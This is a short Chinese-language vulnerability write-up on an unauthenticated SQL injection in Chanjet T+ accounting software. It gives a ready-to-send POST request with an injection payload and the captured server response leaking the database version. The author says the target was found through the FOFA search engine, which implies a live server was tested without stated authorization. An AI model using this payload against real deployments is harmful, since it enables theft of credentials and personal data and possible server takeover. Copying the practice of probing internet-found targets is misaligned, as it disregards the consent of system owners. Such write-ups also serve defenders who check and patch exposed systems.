漏洞說明:
由于暢捷通T+的load接口處未對(duì)用戶的輸入進(jìn)行過濾和校驗(yàn),未經(jīng)身份驗(yàn)證的攻擊者除了可以利用 SOL 注入漏洞獲取數(shù)據(jù)庫(kù)中的信息(例如,管理員后臺(tái)密碼、站點(diǎn)的用戶個(gè)人信息)之外,甚至在高權(quán)限的情況可向服務(wù)器中寫入木馬,進(jìn)一步獲取服務(wù)器系統(tǒng)權(quán)限。
漏洞類型:
數(shù)據(jù)注入
漏洞特征:
POC:
POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load HTTP/1.1
Content-Type: application/json
{"currentAccId":"2' and 1=@@version--+", "currentAcc":"1", "currentDsName":"1", "currentVersion":"1", "currentVersionNo":"1"}
滲透過程:
通過漏洞特征在FOFA找到目標(biāo)
通過poc拿到數(shù)據(jù)庫(kù)版本信息,成功復(fù)現(xiàn)漏洞,點(diǎn)到為止
HTTP/1.1 200 OK
Server: nginx/1.9.9
Date: Thu, 26 Jun 2025 14:09:33 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 355
Connection: keep-alive
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
{"error":{"Message":"245 數(shù)據(jù)庫(kù)錯(cuò)誤, 請(qǐng)重試!\r\n\r\n在將 nvarchar 值 'Microsoft SQL Server 2012 - 11.0.2100.60 (X64) \n\tFeb 10 2012 19:39:15 \n\tCopyright (c) Microsoft Corporation\n\tDeveloper Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )\n' 轉(zhuǎn)換成數(shù)據(jù)類型 int 時(shí)失敗。","Type":"Ufida.T.EAP.ErrorInfo.DatabaseException"}}
閱讀原文:原文鏈接
該文章在 2025/7/18 10:42:42 編輯過